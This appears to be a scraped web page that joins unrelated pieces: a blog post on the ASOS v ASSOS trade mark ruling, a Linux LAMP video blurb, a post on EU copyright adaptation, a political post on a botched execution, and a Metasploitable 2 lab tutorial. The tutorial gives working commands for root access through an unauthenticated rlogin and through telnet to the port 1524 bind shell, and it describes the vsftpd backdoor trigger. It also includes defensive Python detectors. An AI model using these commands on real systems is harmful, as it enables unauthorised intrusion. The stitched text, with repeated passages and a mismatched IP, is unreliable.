Delete/ Get Rid of TR/BProtector.Gen2 Virus and Fix Chaos
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5
How to assess ASSOS: General Court tells all
Case T 647/11 Asos plc v Office for Harmonisation in the Internal Market (Trade Marks and Designs) (OHIM), Roger Maier, a decision of the General Court of the European Union (Seventh Chamber) this past Tuesday, is just one piece in a rather larger jigsaw of interlocking litigation between two assertive brand owners. It's also another sad testament to the dreadfully long time that it seems to take from cradle to grave, as it were, for a Community trade mark application.
Way back in 2005 Asos applied to register the word ASOS as a Community trade mark (CTM) for a range of goods in Classes 3, 18 and 25 and services in Class 35. The goods in Class 18 included ‘articles of leather and imitations of leather; bags; handbags; shoulder bags; bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses; belts; parts and fittings for all the aforesaid goods’. Maier opposed, basing the opposition on his later Community word mark ASSOS, which had the good fortune to be able to enjoy the priority of a Swiss trade mark application filed on 14 June 2005, just 16 days ahead of Asos's effort. The earlier mark was for ‘bleaching preparations and other substances for laundry use; cleaning, polishing, scouring and abrasive preparations; soaps; perfumery, essential oils, cosmetics, hair lotions; dentifrices’ (Class 3), ‘vehicles; apparatus for locomotion by land, air or water’ (Class 12) and ‘clothing, footwear, headgear’ (Class 25). According to Maier, consumers were likely to be confused, given the similarity of the respective marks and the identity or similarity of their goods and services.
Slow-forward to October 2010. That's when the Opposition Division partially upheld the opposition. Yes, it said, there was a likelihood of confusion with regard to all the goods and services in Classes 3, 25 and 35 and also with regard to the following goods in Class 18: ‘articles of leather and imitations of leather; bags; handbags; shoulder bags; bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses; belts; parts and fittings for all the aforesaid goods’.
Asos appealed more or less immediately and, just one year later, in October 2011, got some joy from OHIM's Fourth Board of Appeal. The Board found that the relevant public was the general public in the European Union, deemed to be reasonably well informed and reasonably observant and circumspect [except, says Merpel, when it comes to election time]. Comparing the goods and services, the Board of Appeal held, contrary to the Opposition Division, that ‘bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses’ in Class 18 were not similar to the goods covered by Maier’s earlier mark.
Comparing the marks, while Asos's goods in Class 18 (‘articles of leather and imitations of leather; bags; handbags; shoulder bags; belts; parts and fittings for all the aforesaid goods’) were similar to the goods covered by the earlier mark, the Board of Appeal, taking account of the fact that those signs shared the letters ‘a’, ‘s’, ‘o’ and ‘s’ and differed only in the additional letter ‘s’ in the earlier mark -- and of the fact that that additional letter ‘s’ is hardly audible in many [is it truly audible in any?] of the languages of the European Union -- held that ASOS and ASSOS were very similar both visually and phonetically; in conceptual terms their comparison was neutral in so far as neither of those marks had any meaning for the majority of the relevant public. Overall, having regard to the average distinctiveness of the earlier mark and the high degree of visual and phonetic similarity between the signs, there was a likelihood of confusion in respect of the identical and similar goods. Additionally, the Board noted, Asos had not succeeded in proving that the marks at issue coexisted peacefully within the territory of the European Union [This Kat likes the idea of peaceful coexistence. In his book, the relationship of peaceful coexistence to negotiated coexistence agreements is broadly the same as that of living together when compared with marriage ...].
There was now a general appealfest. Asos applied to the General Court to have the decision of the Board of Appeal annulled in so far as it refused registration of the mark for which it had sought protection, while Maier applied to have the decision of the Board of Appeal amended in so far as it found that there was no likelihood of confusion in respect of the goods listed in Class 18.
Without actually saying "A plague on both your houses", the General Court dismissed both sides' pleas. Its reasoning was based on, among other things, the following considerations:
Assessment of the conceptual element of the ASOS mark
Asos submitted that the Board of Appeal failed to take into account the correct conceptual meaning of the ASOS mark in its global assessment of the likelihood of confusion on the ground that a significant portion of the relevant public will perceive the trade mark applied for, ASOS, as the acronym for ‘as seen on screen’, on the ground that it was the largest independent online retailer of fashion articles and beauty products in the UK and enjoyed extremely high sales throughout the EU. No, said the court. Admittedly, one portion of the English-speaking public will perceive the word ASOS as the acronym for ‘as seen on screen’ and, for that portion of the public, ASOS and ASSOS are conceptually different. However, the other portion of the English-speaking public will not regard ASOS as the acronym for ‘as seen on screen’. Further, given that it is common ground that the relevant public is the public throughout the EU, the relevant public does not consist solely of an English-speaking public. The word element ‘asos’ is not a known acronym and the expression ‘as seen on screen’ is not a basic English expression, likely to be understood by the non-Anglophone public. For the majority of the relevant public, therefore, neither of the signs at issue has a meaning and the conceptual comparison is neutral, as the Board of Appeal observed.
Evidence of peaceful coexistence
Asos maintained that it had demonstrated the peaceful coexistence of the ASOS and ASSOS marks in 18 EU Member States and that the Board of Appeal ought to have taken this into account. No, again, said the court: it cannot be entirely ruled out that, in certain cases, the peaceful coexistence of marks on the market could reduce the likelihood of confusion found by the decision-making bodies of OHIM to exist ["Cannot be entirely ruled out"? This is the sort of language one expects when discussing the existence of the Yeti or Bigfoot]. However, that possibility can be taken into consideration only if, at the very least, during the proceedings before OHIM concerning relative grounds for refusal, the party applying for the Community trade mark duly demonstrated that such coexistence was based on the absence of any likelihood of confusion, on condition that the earlier marks concerned and the marks at issue are identical [Does anyone know why they have to be identical? This looks an arbitrary criterion and an unnecessary restriction in terms of protecting trade mark owners, their competitors and the consumer]. The Board of Appeal concluded that the items of evidence provided by Asos, consisting of two declarations from the head of its legal department, should be [rightly] rejected, since they emanated from Asos itself and were not supported by any additional information originating from independent sources. That finding by the Board of Appeal must be upheld since a declaration originating from the applicant cannot be attributed probative value unless it is corroborated by other items of evidence.
This evidence was ineffective anyway. It did not permit any conclusion to be drawn as to the absence of a likelihood of confusion since it related only to the use of the ASOS trade mark and did not address the manner in which the relevant public was exposed to the ASOS and ASSOS marks together on the same market. What's more, it only addressed the position in 18 EU Member States.
Comparison of goods in Class 18
Finally, the Board of Appeal was right to find that the ‘bumbags; sports bags; casual bags; briefcases; attaché cases; satchels; beauty cases; credit card cases and holders; wallets; purses’ in Class 18 — in contrast with the ‘clothing, footwear, headgear’ in Class 25, which had an aesthetic function — essentially had a practical function, namely that of containing sports equipment, documents, banknotes and coins. Bumbags etc had no aesthetic function and apparently, according to the General Court which obviously knows about these things, are not included in the marketing strategy for fashion accessories. The parties' goods were not complementary and it was unlikely that, when buying a briefcase or a wallet, the purchaser would be asked about the colour of the suits or shoes normally worn or, when buying a sports bag, the colour of his tracksuit. Even if the respective goods had the same distribution channels and the same end users, that would not mean that there was a similarity between them.
Will this be an end to the matter? Asos and Assos have been engaged in some vigorous litigation in England and Wales, where each of them has obtained a measure of satisfaction from the three judgments so far (here, here and here).
Of interest to this Kat were the comments of the General Court concerning the evidential value of litigation before national courts (in this case in England and Wales). Said the court at [17] to [19]:
17 On 21 December 2012, the intervener provided the General Court with a copy of a decision of the High Court of Justice (England & Wales), Chancery Division, of 23 November 2012, as evidence of the existence of a likelihood of confusion. On 8 November 2013, the applicant provided the General Court with a copy of a decision of the High Court of Justice (England & Wales), Chancery Division, of 19 September 2013, as evidence of the absence of any likelihood of confusion.
18 Those decisions, although produced for the first time before the General Court, are not strictly evidence but relate to national case-law, to which, even after the procedure before OHIM is complete, a party has the right to refer ... Neither the parties nor the General Court itself can be precluded from drawing on national case-law for the purposes of interpreting EU law. That possibility of referring to national decisions is not covered by the case-law according to which the action before the Court seeks review of the legality of decisions of the Boards of Appeal in the light of the evidence submitted by the parties before the latter, where the purpose is not to criticise the Boards of Appeal on the ground that they failed to take the factual aspects of a specific national decision into account, but rather to cite decisions in support of a plea alleging that the Boards of Appeal infringed a provision of Regulation No 207/2009 ...
19 It follows that the decisions of the High Court of Justice (England & Wales), Chancery Division, provided by the intervener and the applicant are admissible.
As it turns out, they had no probative value -- but that's another matter.
How to install an Arch Linux LAMP server (Apache, MariaDB, PHP) plus a static IP and the Webmin admin panel
Tip: Watch the video full screen and HD.
LAMP is a combination of free, open source software. The acronym LAMP refers to the first letters of Linux (operating system), Apache HTTP Server, MySQL (database software), and PHP, Perl or Python, principal components to build a viable general purpose web server.
The exact combination of software included in a LAMP package may vary, especially with respect to the web scripting software, as Perl or Python are sometimes dropped from the stack. Similar terms exist for essentially the same software suite (AMP) running on other operating systems, such as Microsoft Windows (WAMP), Mac OS (MAMP), Solaris (SAMP), iSeries (iAMP), or OpenBSD (OAMP).
Though the original authors of these programs did not design them all to work specifically with each other, the development philosophy and tool sets are shared and were developed in close conjunction. The software combination has become popular because it is free of cost, open-source, and therefore easily adaptable, and because of the ubiquity of its components which are bundled with most current Linux distributions.
PLEASE SUBSCRIBE AND FOLLOW ME ON TWITTER!!
https://twitter.com/ribalinux
Blogger
http://ribalinux.blogspot.pt/
https://www.facebook.com/theribalinux
Google+
https://plus.google.com/u/0/110348492032614636584/posts
GET 20 GB OF FREE CLOUD STORAGE FOR YOUR LINUX BOX
https://copy.com?r=YOSJw9
Music
"Airglow" (by Stellardrone)
(http://freemusicarchive.org/music/Stellardrone/
Light_Years_1227/02_Airglow)
Licensed under Creative Commons Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
The right of adaptation has not been generally harmonised at the EU level: true or false?
Calling all students who are revising for their spring exams! What is the right answer to this question?
Until now most people - including a number of leading copyright academics - would have easily opted for 'true'.
However, following a number of recent decisions of the Court of Justice of the European Union (CJEU) and the even more recent leaked text of the draft Impact Assessment (IA) of the Commission on the modernisation of the EU copyright acquis [here and here] this may no longer be the right answer.
First of all: what is the right of adaptation all about?
As explained by leading UK copyright commentary Copinger and Skone James on Copyright, adaptation is usually understood as the transformation of a work into another form of expression that is not tantamount to a simple reproduction, eg making a film out of a novel, although “there is an unclear dividing line between what amounts to a reproduction of a work and what amounts to an adaptation of a work”.
The problem lies indeed here.
At the international level, besides the right of reproduction within Article 9, Article 12 of the Berne Convention states that authors of literary or artistic works shall enjoy the exclusive right of authorising adaptations, arrangements and other alterations of their works. However, the systematic approach of the Berne Convention does not require Union countries to do the same.
As a result, there have remained significant differences in national laws as to whether adaptations and other transformations are to be regarded as forms of reproductions (as is the case, for instance, in France and The Netherlands), or whether they are subject to a separate right (as is the case, for instance, in Italy, Germany and the UK).
As regards EU copyright, the InfoSoc Directive [which - among other things - intended to implement into the EU legal order the WIPO Copyright Treaty, which requires compliance with Articles 1-21 Berne] does not contain any reference to the right of adaptation, which has been instead expressly harmonised in relation to databases [Article 5(b) of Directive 96/9/EC] and computer programs [Article 4(1)(b) of Directive 2009/24/EC].
Therefore, the main question is whether Member States have retained their competence to define the right of adaptation in respect of literary and artistic works [these are the only works subject to Berne right of adaptation and, as such, are the only subject-matter for which possible EU constraints might subsist] other than databases and computer programs, as well as its related exception(s) and limitation(s).
The part about exceptions and limitations is particularly topical.
IPKat readers will remember the very interesting, imaginative and fascinating Modernising Copyright Report released in late 2013 by the Irish Review Committee [if you happen to be in London, do not miss next week's BLACA meeting starring one of the authors of the Report, ie Prof Eoin O'Dell].
This Report included innovative stances on copyright reform policy [this is something to welcome, as boldness and copyright policy have not been seen together very often in recent times], in particular as regards new exceptions and limitations that, while not expressly envisaged in the exhaustive list within Article 5 of the InfoSoc Directive, may be introduced at the level of individual Member States.
Among other things, the Report recommended introducing an innovation exception [here] and also a fair use exception [here].
Speaking of fair use, one of the Terms of Reference for the Review Committee was indeed to "[e]xamine the US style ‘fair use’ doctrine to see if it would be appropriate in an Irish/EU context."
Seeking "to accommodate a range of apparently incompatible views", the Irish Report proposed "a possible draft of a tightly-drawn Irish [so not exactly US-style] fair use exception [according to the Report, this would be necessary to "enable context-sensitive accommodations to be developed as the occasion arises"]", that would be aimed at complementing existing exceptions. These should be exhausted before any claim of fair use could be considered, but also considered as examples of fair use so as to allow workable analogies to be developed.
According to the Report, "there is scope under EU law for member states to adopt a fair use doctrine as a matter of national law, and [the InfoSoc Directive] does not necessarily preclude it (not least because, in our view, [the InfoSoc Directive] has not harmonized the adaptation right [this is also the reason why the Report did not see any obstacles to the adoption of an innovation exception])."
Is this true?
This Kat said 'Yes, but just in part' in a recent longer piece [which you can access and download here], and the Commission appears not to disagree [failed attempt to imitate typical British understatement].
At page 99 of its leaked draft IA, the Commission writes:
"Contrary to the reproduction right and the communication to the public/making available right, there is no express rule with respect to adaptations in the InfoSoc Directive (unlike the Software and in the Database Directive). However, the broad manner in which the reproduction right in Article 2 of that Directive is formulated [yet not defined] and the CJEU's jurisprudence on the scope of the reproduction right notably in Infopaq and Eva-Marie Painer seem to cover adaptations which give rise to a further reproduction within the meaning of Article 2. The pending case Allposters [here; this Kat is confident in saying that this will be one of the most important recent copyright rulings] will shed further light on the scope of Article 2."
From what the Commission said in its draft IA, it would seem that the room left for independent national initiatives - including the adoption of national fair use exceptions - is not that broad, and probably not as broad as submitted by the Irish Review Committee.
This is because any exceptions or limitations to the right of adaptation would have to comply not just with the three-step test [see the ACI Adam case for a recent CJEU application], but also be designed in a way that would not transform them into further – and, as such, forbidden – exceptions (in disguise) to other exclusive rights, notably the right of reproduction.
This Kat believes that Member States are free to legislate in relation to exceptions or limitations to the right of adaptation, but these must be intended narrowly, ie as limited to what can be considered as pure adaptations, not transformative uses of a work that nonetheless also involve its simple reproduction.
For instance, while it is arguable that creating a play from a novel may fall exclusively within the scope of the right of adaptation, it may be more difficult to sustain that the same would happen in the case of an artist that – among other things – reproduced an artistic work in an altered form, eg by adding new elements, or changing the contrast and colour [as recent US fair use examples, see Cariou v Prince and Seltzer v Green Day].
So what is the answer to the initial question? Probably that adaptation has not been expressly and generally harmonised for subject-matter other than computer programs and databases. Nonetheless, Member States' freedom to legislate in respect of this right and related exceptions and limitations does not go as far as to cover activities that would fall within the (broad) scope of the right of reproduction.
GAS CHAMBER.
The Oklahoma execution debacle was horrible -- maybe even worse than Jonah Goldberg's mouthfarts on the subject. But it's close. First Goldberg basically said he was okay with torturing Clayton Lockett to death because Lockett's horrific crime merited such treatment. I don't know why he decided to come back and make it worse -- laziness, I suppose; he already had done the research -- but yeesh:
Many of these convicts no doubt deserve worse in the cosmic sense, but it’s not the place of the state to deliver worse. I am strongly for the death penalty but I have no desire to go down the path to medieval forms of execution where we are expected to take pleasure in someone’s final extravagantly choreographed agonies. Moreover, as a political matter, embracing that kind of thing will ultimately undermine the death penalty itself.
If we torture more of these guys to death, we may lose the voters! Oh, and get a load of this:
Of course there’s considerable hypocrisy at work when death penalty opponents do everything they can to block more humane and efficient means of execution — i.e. the old drug cocktail — and then complain that the remaining or new techniques are unconstitutional. You can make the case that the Lockett fiasco was a forced error by opponents of the death penalty.
See what you stupid libtards did? You made us go to the black market for our killin' drugs. What did you want us to do, wait?
But, I should say, I respect many opponents of the death penalty (even if I recoil at some of their tactics).
Goldberg has transformed the pee-dance into a rhetorical form.
Which brings us to the ridiculous claim that the botched execution was cruel and unusual punishment because it was “torture.” I see that Andy beat me to the punch in noting that, as a legal matter, you can’t torture someone by accident.
Holy shit, just when you think nothing could be worse, Goldberg enlists National Review's foremost torture enthusiast, Andrew McCarthy, and his legalistic determination as to how guilty people should feel about this disaster (unsurprisingly, not at all).
Onward:
But let me put it another way: Lockett wasn’t sentenced to a botched execution. He was sentenced to be executed. Think of it this way: Last night a Pensacola jail blew up because of a gas leak. At least two people died. We don’t know yet whether they were inmates. But, let’s assume they were. Moreover let’s assume they were being held for petty crimes. Their deaths would not amount to “cruel and unusual punishment” even though most reasonable people would agree that stealing a candy bar or urinating in public shouldn’t be crimes punishable by death. That’s because the explosion was an accident.
And this is just like the accident that happened while Oklahoma was trying to kill a guy.
Goldberg ends by yelling at Will McAvoy, which is just perfect.
UPDATE. Regarding Goldberg's objection to death penalty opponents' "tactics," mds comments, "Like what? Picketing courthouses while holding up photos of grisly executions? Loudly berating anyone who goes in, even for a traffic violation, as being complicit in murder? Yeah, I could see how a principled conservative might find such behavior offensive."
Metasploitable 2 : Vulnerability assessment and Remote Login
If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.
As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have rsh-client installed on Kali Linux. The rsh-client package is a remote login utility that allows users to connect to remote machines.
Now you have an administrator privilege shell on Metasploitable 2. That was as easy as typing one line. (and installing an application). We have one more such vulnerability that can be exploited easily.
Portscan
On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP address. This will give you an idea of what the IP of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To scan all hosts in that range, you can use an Nmap SYN scan. Here is what it should look like:
nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. Also, it has a huge lot of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the metasploitable machine, after logging in with msfadmin:msfadmin, you can execute an ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever may be your case).
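To turn a scan like this into something a defender can act on, here is an added Python example (not part of the original tutorial) that parses nmap's grepable (-oG) output and flags the legacy services this tutorial goes on to use. The scan output it reads is a constructed sample, not a real capture.

```python
import re

# Legacy / unauthenticated services named in this tutorial. Any of these showing
# up "open" on an internal host deserves a ticket, not a shrug.
RISKY_PORTS = {
    21: "ftp (cleartext credentials; the version on Metasploitable 2 is backdoored)",
    23: "telnet (cleartext login)",
    512: "rexec (rsh family, host-based trust)",
    513: "rlogin (rsh family, host-based trust)",
    514: "rsh (rsh family, host-based trust)",
    1524: "ingreslock (root bind shell on Metasploitable 2)",
}

# One "Host: ... Ports: ..." line per host in `nmap -oG` output.
HOST_RE = re.compile(r"^Host:\s+(\S+).*?Ports:\s+(.*?)(?:\s+Ignored State:.*)?$")

def parse_grepable(text):
    """Return {host: [(port, state, proto, service), ...]} from `nmap -oG` output."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        entries = []
        for item in m.group(2).split(","):
            fields = item.strip().split("/")   # port/state/proto/owner/service/...
            if len(fields) < 5:
                continue
            entries.append((int(fields[0]), fields[1], fields[2], fields[4]))
        hosts[m.group(1)] = entries
    return hosts

def flag_risky(hosts):
    """Return a list of (host, port, reason) for open ports listed in RISKY_PORTS."""
    findings = []
    for host, entries in hosts.items():
        for port, state, _proto, _service in entries:
            if state == "open" and port in RISKY_PORTS:
                findings.append((host, port, RISKY_PORTS[port]))
    return findings

# Constructed sample of `nmap -sS -oG - 192.168.154.0/24` output (not a real capture).
SAMPLE = """# Nmap scan initiated as: nmap -sS -oG - 192.168.154.0/24
Host: 192.168.154.131 ()\tStatus: Up
Host: 192.168.154.131 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)
Host: 192.168.154.132 ()\tStatus: Up
Host: 192.168.154.132 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 512/open/tcp//exec///, 513/open/tcp//login///, 514/open/tcp//shell///, 1524/open/tcp//ingreslock///\tIgnored State: closed (993)
"""
```

Running `flag_risky(parse_grepable(SAMPLE))` lists every flagged port on 192.168.154.132 together with the reason it matters.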
Vulnerabilities
Now, the Metasploitable 2 operating system has been loaded with a large number of vulnerabilities. There are the following kinds of vulnerabilities in Metasploitable 2:
- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
- Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
- Weak Passwords - These are vulnerable to bruteforce attacks.
- Vulnerable Web Services - A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
- Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very resourceful article about many of these vulnerabilities on the Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came across during the port scan? Ports 512, 513 and 514 are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely log in to Metasploitable 2. Type rlogin to see the details about the command structure.
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
[user@]hostname [command]
rlogin -l root 192.168.154.132
Most probably you will get something like this:
root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password:
As you can see, it is asking for a password. It's not because the target is not vulnerable. It's because we don't have rsh-client installed on Kali Linux (notice that rlogin printed the ssh usage text above). The rsh-client package is a remote login utility that allows users to connect to remote machines.
apt-get install rsh-client
This will start the installation process; you'll have to type yes once or twice, and Kali will do the rest for you. After the installation is successful, try your previous command again. This time around, things will go better.
root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
Now you have a root (administrator privilege) shell on Metasploitable 2. That was as easy as typing one line (and installing an application). We have one more such vulnerability that can be exploited just as easily.
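The password-less rlogin succeeds because the rsh-family daemons on ports 512-514 trust whatever hosts and users are listed in /etc/hosts.equiv and the target user's ~/.rhosts. As an added defender's check (not from the original tutorial), the Python below audits those files for wildcard entries; the file contents are constructed samples, and the assumption that the misconfiguration takes the form of a "+ +" entry is mine, not something the page states.

```python
from pathlib import Path

# Trust files consulted by rlogind/rshd (netkit daemons behind ports 513/514).
SYSTEM_TRUST_FILES = ["/etc/hosts.equiv"]

def classify_entry(line):
    """Map one hosts.equiv/.rhosts line to a severity string, or None if benign."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):   # blank line or comment
        return None
    host = fields[0]
    user = fields[1] if len(fields) > 1 else None
    if host.startswith("-"):                        # explicit deny entry
        return None
    if host == "+" and user == "+":
        return "critical: any host, any user (password-less root if this is /root/.rhosts)"
    if host == "+":
        return "high: any host trusted" + (f" for user {user}" if user else "")
    if user == "+":
        return f"high: any user trusted from host {host}"
    if host.startswith("+@") or (user and user.startswith("+@")):
        return "medium: netgroup wildcard; review the netgroup membership"
    return None

def audit_trust_file(path, text):
    """Return [(path, lineno, line, severity)] for every risky entry in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        severity = classify_entry(line)
        if severity:
            findings.append((path, lineno, line.strip(), severity))
    return findings

def audit_host(home_dirs=("/root",), extra_files=SYSTEM_TRUST_FILES):
    """Audit the usual trust files on the local machine, skipping ones that do not exist."""
    findings = []
    candidates = list(extra_files) + [str(Path(h) / ".rhosts") for h in home_dirs]
    for p in candidates:
        try:
            findings += audit_trust_file(p, Path(p).read_text())
        except OSError:
            continue
    return findings

# Constructed sample contents (hypothetical), mirroring the kind of wildcard trust
# that would let an rlogin like the one above succeed without a password.
SAMPLE_RHOSTS = "+ +\n"
SAMPLE_HOSTS_EQUIV = "# trusted admin workstation\nadminbox.example.internal\n+\n-badhost\n"
```

On a real host, `audit_host(home_dirs=[...])` walks the given home directories plus /etc/hosts.equiv and returns every wildcard entry with its line number.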
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version installed on Metasploitable 2 contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people had downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can log in to the computer without knowing the credentials, just by using :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then, something for your appetite:
telnet 192.168.99.131 1524
This is another one-line exploit, on the 1524 ingreslock port (see the portscan result). I will post more stuff soon, but this is all for now.
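For the VSFTPD backdoor described above, the added Python below (not part of the original post) scans vsftpd protocol log lines for USER commands ending in ":)", which is the trigger the text describes. The log lines are constructed, and the line format is assumed to match what vsftpd writes with log_ftp_protocol enabled.

```python
import re

# Shape of vsftpd "FTP command" lines when log_ftp_protocol=YES (assumed format;
# the sample lines below are constructed, not taken from a real server).
CMD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ [\d:]+ \d{4}) \[pid (?P<pid>\d+)\] '
    r'(?:\[(?P<user>[^\]]*)\] )?FTP command: Client "(?P<client>[^"]+)", "(?P<cmd>[^"]*)"$'
)

def is_backdoor_trigger(ftp_command):
    """True if an FTP USER command carries the ':)' suffix that arms the backdoor."""
    verb, _, arg = ftp_command.partition(" ")
    return verb.upper() == "USER" and arg.rstrip().endswith(":)")

def scan_vsftpd_log(lines):
    """Return (timestamp, client, username) for every backdoor trigger attempt seen."""
    hits = []
    for line in lines:
        m = CMD_RE.match(line.rstrip("\n"))
        if m and is_backdoor_trigger(m.group("cmd")):
            hits.append((m.group("ts"), m.group("client"), m.group("cmd").split(" ", 1)[1]))
    return hits

# Constructed sample log: one normal login followed by one trigger attempt.
SAMPLE_LOG = """Thu May  1 11:40:01 2014 [pid 4120] CONNECT: Client "192.168.154.131"
Thu May  1 11:40:02 2014 [pid 4120] FTP command: Client "192.168.154.131", "USER msfadmin"
Thu May  1 11:40:03 2014 [pid 4120] [msfadmin] FTP command: Client "192.168.154.131", "PASS <password>"
Thu May  1 11:41:10 2014 [pid 4131] CONNECT: Client "192.168.154.140"
Thu May  1 11:41:11 2014 [pid 4131] FTP command: Client "192.168.154.140", "USER xyz:)"
Thu May  1 11:41:11 2014 [pid 4131] FTP command: Client "192.168.154.140", "PASS <password>"
""".splitlines()

if __name__ == "__main__":
    for ts, client, user in scan_vsftpd_log(SAMPLE_LOG):
        print(f"{ts}  backdoor trigger from {client} as user {user!r}")
```

A hit is a strong signal whether or not the server is the backdoored build, since no legitimate client sends that suffix; pair it with a check that nothing on the host is listening on port 6200.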
Metasploitable 2 : Vulnerability assessment and Remote Login
Reviewed by 0x000216
on
Thursday, May 01, 2014
Rating: 5